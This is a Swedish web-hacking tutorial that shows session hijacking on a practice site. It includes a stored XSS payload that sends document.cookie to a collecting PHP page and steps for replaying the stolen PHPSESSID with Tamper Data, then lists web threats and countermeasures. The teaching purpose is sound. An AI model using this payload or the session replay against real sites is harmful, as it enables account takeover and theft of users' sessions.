Hur hackar man en webbplats? Vanliga webbplatshackningstekniker

Tekniker för hackning av webbplatser

Fler människor har tillgång till internet än någonsin tidigare. Detta har fått många organisationer att utveckla webbaserade applikationer som användare kan använda online för att interagera med organisationen. Dåligt skriven kod för webbapplikationer kan utnyttjas för att få obehörig åtkomst till känslig data och webbservrar.

I den här handledningen kommer du att lära dig hur du hackar webbplatser, och vi kommer att presentera dig för tekniker för hackning av webbapplikationer och motåtgärder du kan sätta på plats för att skydda mot sådana attacker.

Hur man hackar en webbplats

I detta praktiska scenario för webbplatshackning kommer vi att kapa användarsessionen för webbapplikationen som finns på www.techpanda.org. Vi kommer att använda cross site scripting för att läsa cookie-sessions-id:t och sedan använda det för att imitera en legitim användarsession.

Antagandet som görs är att angriparen har tillgång till webbapplikationen och han skulle vilja kapa sessioner för andra användare som använder samma applikation. Målet med denna attack kan vara att få administratörsåtkomst till webbapplikationen förutsatt att angriparens åtkomstkonto är begränsat.

Steg 1) Öppna URL http://www.techpanda.org/.

För övningsändamål rekommenderas det starkt att få åtkomst med SQL Injection. Hänvisa till detta Artikeln för mer information om hur du gör det.

Steg 2) Ange inloggningsuppgifter.

Inloggningsmailen är admin@google.com, lösenordet är Password2010.

Steg 3) Kontrollera instrumentpanelen.

Om du har loggat in framgångsrikt får du följande instrumentpanel

Hacka en webbplats

Steg 4) Ange nytt innehåll.

Klicka på Lägg till ny kontakt och ange följande som förnamn

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>

Steg 5) Lägg till Javascript.

Ovanstående kod använder JavaScript. Den lägger till en hyperlänk med en onclick-händelse. När den intet ont anande användaren klickar på länken hämtar händelsen PHP cookie-sessions-ID och skickar det till snatch_sess_id.php sida tillsammans med sessions-id:t i URL:en

Hacka en webbplats

Steg 6) Lägg till detaljer.

Ange de återstående uppgifterna enligt nedan och klicka på Spara ändringar

Hacka en webbplats

Steg 7) Kontrollera instrumentpanelen.

Din instrumentpanel kommer nu att se ut som följande skärm

Hacka en webbplats

Steg 8) Kontrollera sessions-id.

  • Eftersom cross site script-koden lagras i databasen, kommer den att laddas varje gång användarna med åtkomsträttigheter loggar in
  • Låt oss anta att administratören loggar in och klickar på hyperlänken som säger Dark
  • Han/hon kommer att få fönstret med sessions-id:t som visas i URL:en
  • Hacka en webbplats

    Anmärkningar: Skriptet kan skicka värdet till någon fjärrserver där PHPSESSID lagras och sedan omdirigeras användaren tillbaka till webbplatsen som om ingenting hade hänt.

    Anmärkningar: värdet du får kan skilja sig från det på den här webbsidan hacka handledning, men konceptet är detsamma

    Sessionsidentifiering med hjälp av Firefox och Tamper Data-tillägget

    Flödesschemat nedan visar de steg som du måste ta för att slutföra den här övningen.

    Sessionsidentifiering med hjälp av Firefox och Tamper Data-tillägget

    • Du behöver Firefox webbläsare för detta avsnitt och tillägget Tamper Data
    • Öppen Firefox och installera tillägget som visas i diagrammen nedan

    Sessionsidentifiering med hjälp av Firefox och Tamper Data-tillägget

    Sessionsidentifiering med hjälp av Firefox och Tamper Data-tillägget

    • Sök efter manipuleringsdata och klicka sedan på installera som visas ovan

    Sessionsidentifiering med hjälp av Firefox och Tamper Data-tillägget

    • Klicka på Acceptera och installera...

    Sessionsidentifiering med hjälp av Firefox och Tamper Data-tillägget

    Sessionsidentifiering med hjälp av Firefox och Tamper Data-tillägget

    • Klicka på Starta om nu när installationen är klar
    • Aktivera menyraden i Firefox om det inte visas

    Sessionsidentifiering med hjälp av Firefox och Tamper Data-tillägget

    • Klicka på verktygsmenyn och välj sedan Tamper Data som visas nedan

    Sessionsidentifiering med hjälp av Firefox och Tamper Data-tillägget

    • Du får följande fönster. Obs: Om Windows är inte tom, tryck på rensa-knappen

    Sessionsidentifiering med hjälp av Firefox och Tamper Data-tillägget

    • Klicka på menyn Starta sabotage
    • Växla tillbaka till Firefox webbläsare, typ http://www.techpanda.org/dashboard.php tryck sedan på enter-tangenten för att ladda sidan
    • Du kommer att få följande popup från Tamper Data

    Sessionsidentifiering med hjälp av Firefox och Tamper Data-tillägget

    • Popup-fönstret har tre (3) alternativ. Alternativet Tamper låter dig ändra HTTP-huvudinformationen innan den skickas till servern.
    • Klicka på det
    • Du kommer att få upp följande fönster

    Sessionsidentifiering med hjälp av Firefox och Tamper Data-tillägget

    • kopiera PHP session ID du kopierade från attackens URL och klistrade in den efter likhetstecknet. Ditt värde ska nu se ut så här
    PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
    • Klicka på OK-knappen
    • Du kommer att få upp popup-fönstret för sabotagedata igen

    Sessionsidentifiering med hjälp av Firefox och Tamper Data-tillägget

    • Avmarkera kryssrutan som frågar Fortsätt manipulera?
    • Klicka på Skicka-knappen när du är klar
    • Du bör kunna se instrumentpanelen som visas nedan

    Sessionsidentifiering med hjälp av Firefox och Tamper Data-tillägget

    Anmärkningar: vi loggade inte in, vi efterliknade en inloggningssession med PHPSESSID-värdet som vi hämtade med cross site scripting

    Vad är en webbapplikation? Vad är webbhot?

    En webbapplikation (alias webbplats) är en applikation baserad på klient-servermodellen. De server ger databasåtkomst och affärslogik. Den finns på en webbserver. Klientapplikationen körs på klientens webbläsare. Webbapplikationer är oftast skrivna på språk som t.ex Java, C# och VB.Net, PHP, ColdFusion Markup Language, etc. databasmotorerna som används i webbapplikationer inkluderar MySQL, MS SQL Server, PostgreSQL, SQLiteEtc.

    Bästa hackningstekniker för webbplatser

    De flesta webbapplikationer finns på offentliga servrar som är tillgängliga via Internet. Detta gör dem sårbara för attacker på grund av lättillgänglighet. Följande är vanliga webbapplikationshot.

    • SQL Injection – Målet med detta hot kan vara att kringgå inloggningsalgoritmer, sabotera data, etc.
    • Förnekande av serviceangrepp– Målet med detta hot kan vara att neka legitima användare tillgång till resursen
    • Cross Site Scripting XSS– Målet med detta hot kan vara att injicera kod som kan köras på klientsidans webbläsare.
    • Cookie/sessionsförgiftning– Målet med detta hot är att modifiera cookies/sessionsdata av en angripare för att få obehörig åtkomst.
    • Formmanipulering – Målet med detta hot är att modifiera formulärdata såsom priser i e-handelsapplikationer så att angriparen kan få varor till reducerade priser.
    • Kodinjektion – Målet med detta hot är att injicera kod som PHP, Python, etc. som kan köras på servern. Koden kan installera bakdörrar, avslöja känslig information, etc.
    • förvanskning– Målet med detta hot är att ändra sidan som visats på en webbplats och omdirigera alla sidförfrågningar till en enda sida som innehåller angriparens meddelande.

    Hur skyddar du din webbplats mot hacks?

    En organisation kan anta följande policy för att skydda sig mot webbserverattacker.

    • SQL Injection – sanering och validering av användarparametrar innan de skickas till databasen för bearbetning kan bidra till att minska risken för att bli attackerad via SQL Injection. Databasmotorer som MS SQL Server, MySQL, etc. stödparametrar och förberedda uttalanden. De är mycket säkrare än traditionella SQL-satser
    • Denial of Service-attacker – brandväggar kan användas för att släppa trafik från en misstänkt IP-adress om attacken är en enkel DoS. Korrekt konfiguration av nätverk och intrångsdetektionssystem kan också bidra till att minska risken för en DoS attack varit framgångsrik.
    • Cross Site Scripting – validering och sanering av rubriker, parametrar som skickas via URL:en, formulärparametrar och dolda värden kan hjälpa till att minska XSS-attacker.
    • Cookie/sessionsförgiftning – detta kan förhindras genom att kryptera innehållet i cookies, tidsgräns för cookies efter en tid, associera cookies med klientens IP-adress som användes för att skapa dem.
    • Formhärdning – detta kan förhindras genom att validera och verifiera användarinmatningen innan den bearbetas.
    • Kodinjektion – detta kan förhindras genom att behandla alla parametrar som data snarare än körbar kod. Sanering och validering kan användas för att implementera detta.
    • Förnedring – en bra säkerhetspolicy för webbapplikationsutveckling bör säkerställa att den förseglar vanliga sårbarheter för att komma åt webbservern. Detta kan vara en korrekt konfiguration av operativsystemet, webbserverprogramvara och bästa säkerhetspraxis vid utveckling av webbapplikationer.
    Kontrollera detta: 9 bästa URL-skannrar för att kontrollera länken är säkra från skadlig programvara

    Sammanfattning

    • En webbapplikation är baserad på server-klient-modellen. Klientsidan använder webbläsaren för att komma åt resurserna på servern.
    • Webbapplikationer är vanligtvis tillgängliga över internet. Detta gör dem sårbara för attacker.
    • Webbapplikationshot inkluderar SQL Injection, Code Injection, XSS, Defacement, Cookie-förgiftning, etc.
    • En bra säkerhetspolicy när du utvecklar webbapplikationer kan hjälpa till att göra dem säkra.